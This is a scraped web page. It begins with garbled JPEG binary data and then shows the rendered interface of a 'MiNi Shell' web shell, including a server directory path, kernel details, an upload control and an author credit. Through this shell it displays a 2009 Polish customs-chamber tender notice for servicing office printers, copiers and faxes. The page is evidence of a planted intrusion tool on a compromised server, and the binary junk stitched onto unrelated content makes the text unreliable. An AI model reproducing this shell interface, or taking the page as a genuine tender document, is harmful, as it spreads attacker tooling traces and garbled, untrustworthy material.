JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/326350-N-2009.html

<p class="kh_header"><b>Gdynia: świadczenie pogwarancyjnych usług serwisowych (naprawa, konserwacja, wymiana materiałów eksploatacyjnych, wymiana części nietypowych) urządzeń biurowych Zamawiającego</b><br>
<b>Numer ogłoszenia: 326350 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Gdyni , ul. Północna 9A, 81-029 Gdynia, woj. pomorskie, tel. 058 6669088, faks 058 6669226.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdynia.uc.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: służba celna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie pogwarancyjnych usług serwisowych (naprawa, konserwacja, wymiana materiałów eksploatacyjnych, wymiana części nietypowych) urządzeń biurowych Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	PRZEDMIOT ZAMÓWIENIA:

A. Przedmiotem zamówienia jest świadczenie pogwarancyjnych usług serwisowych (naprawa, konserwacja, wymiana materiałów eksploatacyjnych, wymiana części nietypowych) urządzeń biurowych Zamawiajacego.

B. Szczegółowy opis przedmiotu zamówienia został określony 
w Załączniku Nr 1 do niniejszej Specyfikacji.

C. Szczegółowe wymagania odnośnie realizacji przedmiotu zamówienia okreslone zostały we wzorze umowy stanowiącym Załącznik Nr 2 
do niniejszej Specyfikacji.

Załącznik Nr 1 - sprawa 2532-PN-6/09 - opis przedmiotu zamówienia




I. Przedmiot zamówienia:

1.	Przedmiotem zamówienia jest świadczenie pogwarancyjnych usług serwisowych (naprawa, konserwacja, wymiana materiałów eksploatacyjnych, wymiana części nietypowych) niżej wymienionych urządzeń biurowych.

WYKAZ URZĄDZEŃ BIUROWYCH OBJĘTYCH POSTĘPOWANIEM

Lp.	Rodzaj	Typ	Ilość	Lokalizacja
1.	Kopiarka	Xerox 425ST	5	Trójmiasto
2.	Drukarka	Xerox 3450DN	18	Trójmiasto
3.	Drukarka	Xerox 3450DN	2	poza Trójmiastem
4.	Kopiarka	Toshiba e-studio 165	8	Trójmiasto
5.	Kopiarka	Toshiba e-studio 230	2	Trójmiasto
6.	Kopiarka	Toshiba e-studio 230	1	poza Trójmiastem
7.	Kopiarka	Toshiba e-studio 232	6	Trójmiasto
8.	Kopiarka	Toshiba e-studio 352	5	Trójmiasto
9.	Kopiarka	Toshiba e-studio 450	2	Trójmiasto
10.	Kopiarka	Kyocera 1620	9	Trójmiasto
11.	Kopiarka	Kyocera 1635	2	Trójmiasto
12.	Kopiarka	Konica Bizhub 250	13	Trójmiasto
13.	Drukarka	Xerox 4510	4	Trójmiasto
14.	Drukarka	Lexmark c780N	1	Trójmiasto
15.	Drukarka	Samsung ML-4050N	6	Trójmiasto
16.	Drukarka	HP H470b	3	Trójmiasto
17.	Drukarka	Brother 8860	9	Trójmiasto
18.	Drukarka	Brother 8860	1	poza Trójmiastem
19.	Drukarka	Lexmark E250DN	13	Trójmiasto
20.	Drukarka	Kyocera FS-2000 DN	3	Trójmiasto
21.	Faks	Canon L-160	1	Trójmiasto
22.	Drukarka	Lexmark x502n	1	Trójmiasto
23.	Drukarka	Aficio cl3500dn	2	Trójmiasto
24.	Drukarka	Samsung scx4828fn	3	Trójmiasto
25.	Drukarka	Lexmark T632DN	1	Trójmiasto
26.	Drukarka	Lexmark T642DN	7	Trójmiasto
27.	Drukarka	Lexmark T642DN	1	poza Trójmiastem
28.	Drukarka	Lexmark E352	7	Trójmiasto
29.	Drukarka	Brother 5250	25	Trójmiasto
30.	Drukarka	Brother 5250	4	poza Trójmiastem
31.	Drukarka	HPLJ 3380	5	Trójmiasto
32.	Drukarka	HPLJ 3300	1	Trójmiasto
33.	Kopiarka	Canon 1020	1	Trójmiasto
34,	Kopiarka	Canon 1550	8	Trójmiasto
35.	Kopiarka	Canon 1550	2	poza Trójmiastem
36.	Kopiarka	Canon 6512	3	Trójmiasto
37.	Kopiarka	Gestetner 2615	1	Trójmiasto
38.	Kopiarka	Gestetner 2822	5	Trójmiasto
39.	Kopiarka	Gestetner 2822	1	poza Trójmiastem
40.	Kopiarka	Toshiba 1550	12	Trójmiasto
41.	Kopiarka	Toshiba 1550	3	poza Trójmiastem
42.	Kopiarka	Toshiba 3550	11	Trójmiasto
43.	Kopiarka	Toshiba 3550	2	poza Trójmiastem
44.	Kopiarka	Toshiba 3560	2	Trójmiasto
45.	Kopiarka	Toshiba 3560	1	poza Trójmiastem
46.	Kopiarka	Toshiba 5560	2	Trójmiasto
47.	Drukarka	HPLJ 8150	4	Trójmiasto
48.	Drukarka	HPLJ 4550	2	Trójmiasto
49.	Drukarka	Kyocera 800	1	Trójmiasto
50.	Drukarka	Kyocera 3700	2	Trójmiasto
51.	Drukarka	Lexmark OPTRA	6	Trójmiasto
52.	Drukarka	HPLJ 1200	21	Trójmiasto
53.	Drukarka	HPLJ 1200	4	poza Trójmiastem
54.	Drukarka	HPLJ 1300	11	Trójmiasto
55.	Drukarka	HPLJ 1300	3	poza Trójmiastem
56.	Drukarka	HPLJ 2300DN	27	Trójmiasto
57.	Drukarka	HPLJ 2300DN	4	poza Trójmiastem
58.	Drukarka	OKI 321	1	Trójmiasto
59.	Drukarka	OKI 3390	19	Trójmiasto
60.	Drukarka	OKI 3390	2	poza Trójmiastem
61.	Drukarka	Printronix 5250	2	Trójmiasto
62.	Drukarka	Canon IP 90	12	Trójmiasto
63.	Drukarka	Canon IP 90	2	poza Trójmiastem
64.	Drukarka	Canon IP 8500	1	Trójmiasto
65.	Drukarka	Canon IP 80	1	Trójmiasto
66.	Drukarka	HPLJ 1022	3	Trójmiasto
67.	Drukarka	HPLJ 2420	1	Trójmiasto
68.	Drukarka	HPLJ 340	1	Trójmiasto
69.	Drukarka	HPLJ 6122	1	Trójmiasto
70.	Drukarka	HPLJ 6L	8	Trójmiasto
71.	Drukarka	HPLJ 7140	2	Trójmiasto
72.	Drukarka	HPLJ M1522	1	Trójmiasto
73.	Drukarka	HPLJ 2015	1	Trójmiasto
74.	Drukarka	HPLJ 1320	2	Trójmiasto
75.	Drukarka	PageMaster 2400	2	Trójmiasto
76.	Drukarka	HPLJ 4650	1	Trójmiasto
77.	Faks	Canon B100	5	Trójmiasto
78.	Faks	Canon B150	3	Trójmiasto
79.	Faks	Canon B150	2	poza Trójmiastem
80.	Faks	Canon B155	10	Trójmiasto
81.	Faks	Canon B155	2	poza Trójmiastem
82.	Faks	Canon L180	1	poza Trójmiastem
83.	Faks	Canon L120	1	Trójmiasto
84.	Faks	Canon L200	5	Trójmiasto
85.	Faks	Canon L250	2	Trójmiasto
86.	Faks	Canon L290	10	Trójmiasto
87.	Faks	Canon L290	1	poza Trójmiastem
88.	Faks	Canon L295	6	Trójmiasto
89.	Faks	Canon L300	2	Trójmiasto
90.	Faks	Brother 2920	11	Trójmiasto
91.	Faks	Brother 2920	1	poza Trójmiastem
92.	Faks	Panasonic Kx-FL613P	1	Trójmiasto
93.	Faks	Panasonic Kx-MF131	1	Trójmiasto
94.	Drukarka	HPLJ 3300	1	Trójmiasto
95.	Drukarka	HPLJ 3330	1	Trójmiasto
96.	Drukarka	HPLJ 4100	2	Trójmiasto
97.	Drukarka	HPLJ 4100	1	poza Trójmiastem


2.	Serwis urządzeń winien obejmować:

A/ konserwację urządzenia wraz z RADF/ADF tj. - sprawdzenie i regulacja pracy urządzenia oraz przesmarowanie elementów ruchomych. Wyczyszczenie zespołów urządzenia,  wnętrza i obudowy.

B/ naprawę nw. zespołów:
- zespołu kserograficznego,
- zespołu napędu papieru,
- zespołu napędu głównego,
- zespołu napędu skanera,
- zespołu napędu optyki,
- zespołu utrwalania,
- zespołu transportu papieru,
- zespołu sterowania,
- zespołu wywoływania,
- zespołu dupleksu,
- zespołu RADF/ADF,
- zespołu sortera,
- zespołu LCC 

C/ naprawy nietypowe - nie wymienione w punkcie B

D/ dostawę i wymiana materiałów eksploatacyjnych:

-	Bęben światłoczuły:
-	Toshiba 165
-	Toshiba 230
-	Toshiba 232
-	Toshiba 352
-	Toshiba 450
-	Konica Bizhub 250

Listwa czyszcząca bęben:
-	Toshiba 165
-	Toshiba 230
-	Toshiba 232
-	Toshiba 352
-	Toshiba 450
-	Konica Bizhub 250

-	Deweloper: 
-	Toshiba 165
-	Toshiba 230
-	Toshiba 232
-	Toshiba 352
-	Toshiba 450
-	Konica Bizhub 250

E/ dostawę i wymiana części nietypowych


II. Wymagania dodatkowe:

A/ Wykonawca zapewnia dyspozycyjność - zlecenia realizowane będą zgodnie z potrzebami Zamawiającego, w miejscu użytkowania sprzętu.

B/ Wykonawca zobowiązany jest do bezpłatnego zdiagnozowania przyczyn awarii, przedstawienia zakresu naprawy i jej kosztów w formie pisemnej w terminie 24 godzin, licząc od momentu otrzymania zawiadomienia przekazanego za pośrednictwem poczty elektronicznej, telefaksu.

C/ Wykonawca zobowiązany jest przystąpić i dokonać naprawy, konserwacji, wymiany materiałów eksploatacyjnych oraz części zamiennych w terminie 48 godzin, licząc od momentu otrzymania zlecenia przekazanego za pośrednictwem poczty elektronicznej, telefaksu.

D/ w przypadku, gdy czas naprawy będzie dłuższy niż 3 dni robocze licząc od dnia otrzymania zlecenia, Wykonawca zobowiązany jest do dostarczenia urządzenia zastępczego o nie gorszych parametrach w miejsce przeprowadzanej naprawy wraz ze sterownikami i instrukcją w języku polskim.

E/ Wykonawca zobowiązany jest do stosowania oryginalnych części zamiennych, oryginalnych materiałów eksploatacyjnych. Zamawiający dopuszcza możliwość stosowania części/materiałów równoważnych do oryginalnych, przy czym ich parametry nie mogą być gorsze od parametrów  części/materiałów oryginalnych. Obowiązek udokumentowania równoważności stosowanych części spoczywa na Wykonawcy.

F/ za wykonane prace Wykonawca zobowiązany jest do udzielenia min. 12 miesięcznej gwarancji.

G/ Do rozliczenia napraw i konserwacji ujętych w pkt. 2/A, 2/B, 2/C  Opisu Przedmiotu Zamówienia ma zastosowanie stawka 1 roboczogodziny Wykonawcy. 

H/ Do rozliczania kosztów wymiany materiałów eksploatacyjnych ujętych w pkt.2/D Opisu Przedmiotu Zamówienia stosuje się stawkę 1 roboczogodziny oraz cenę materiałów eksploatacyjnych zgodnie z ofertą Wykonawcy.

I/ Do rozliczania kosztów usługi wymiany części nietypowych zgodnie z pkt.2/E Opisu Przedmiotu Zamówienia stosuje się stawkę 1 roboczogodziny Wykonawcy. Naliczanie kosztów zakupu części nietypowych przez Wykonawcę dla potrzeb Zamawiającego wykonuję się na podstawie faktury VAT dotyczącej zakupu części przez Wykonawcę oraz nalicza się marżę zgodnie z ofertą Wykonawcy. Wykonawca na prośbę Zamawiającego ma obowiązek niezwłocznego przesłania faktury VAT dotyczącej zakupu części do siedziby  Zamawiającego (dopuszczalna jest możliwość przesłanie faktury za pośrednictwem poczty elektronicznej lub telefaksu). Naliczanie marży spoczywa po stronie Wykonawcy.

J/ za dojazd do miejsca lokalizacji sprzętu biurowego na terenie Trójmiasta, Wykonawcy nie przysługuje zwrot kosztów dojazdu niezależnie od lokalizacji siedziby Wykonawcy. W przypadku sprzętu biurowego usytuowanego w jednostkach organizacyjnych Zamawiającego mających siedzibę poza Trójmiastem, Wykonawcy przysługuje zwrot kosztów  dojazdu. Obliczenie wysokości kosztów dojazdu następuje poprzez przemnożenie ilości kilometrów przez stawkę za 1 kilometr przebiegu pojazdu osobowego o pojemności skokowej silnika do 900 cm3 określonej w § 2 Rozporządzenia Ministra Infrastruktury z dnia 25.03.2002r. w sprawie warunków ustalania oraz sposobu dokonywania zwrotu kosztów używania do celów służbowych samochodów osobowych, motocykli i motorowerów nie będących własnością pracodawcy. (Dz. U Nr 27, poz. 271 z późn. zm.)

Przyjmuje się następujące odległości do:
    - OC w Kwidzynie - 97 km
    - OC Starogard Gdański - 65 km
    - OC Starogard Gdański Miejsce Wyznaczone w Tczewie - 52 km
    - UC w Słupsku -  107 km
    - OC w Chojnicach - 120 km
    - OC w Ustce - 120 km
    - OC we Władysławowie - 38 km..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda złożenia/wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.	WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPOSÓB ICH SPEŁNIENIA:

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

1.	 złożą ofertę cenową zgodnie z Załącznikiem Nr 3 do SIWZ
2.	spełniają warunki określone w art. 22 ust. 1 ustawy PZP
3.	złożą oświadczenia i dokumenty wymagane przez Zamawiajacego

Sposób oceny:

Zamawiający dokona oceny spełnienia warunków stawianych Wykonawcą na podstawie wymaganych dokumentów, złożonych przez Wykonawcę wg. formuły: spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> OŚWIADCZENIA LUB DOKUMENTY, JAKIE DOSTARCZYĆ MAJĄ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU.

1.	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22, ust. 1 ustawy Prawo zamówień publicznych, podpisane przez przedstawicieli Wykonawcy upoważnionych do reprezentowania firmy, zgodnie 
z Załącznikiem Nr 4 do niniejszej SIWZ.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Imienny wykaz osób, które będą uczestniczyły w wykonywania zamówienia.
4.	Pełnomocnictwo w przypadku, gdy Wykonawca jest reprezentowany przez osobę inną niż określoną w dokumencie rejestracyjnym (ustanowienie pełnomocnika podlega opłacie skarbowej zgodnie z ustawą z dnia 16-11-2006 r. o opłacie skarbowej - Dz.U.Nr 225, poz. 1635 
z późn. zm).

Wszelkie dokumenty składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (pieczęć firmowa lub czytelny podpis lub pieczęć imienna i nieczytelny podpis).

Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 20</li>
<li>2 - stawka roboczogodziny - 65</li>
<li>3 - marża na części nietypowe - 15</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gdynia.uc.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Logistyki
ul. Północna 9 A
81-029 Gdynia
od poniedziałku do piątku w godzinach: 08.00-14.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2009 godzina 09:30, miejsce: Kancelaria Izby Celnej w Gdyni
ul. Północna 9 A
81-029 Gdynia 
parter, pokój 003.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com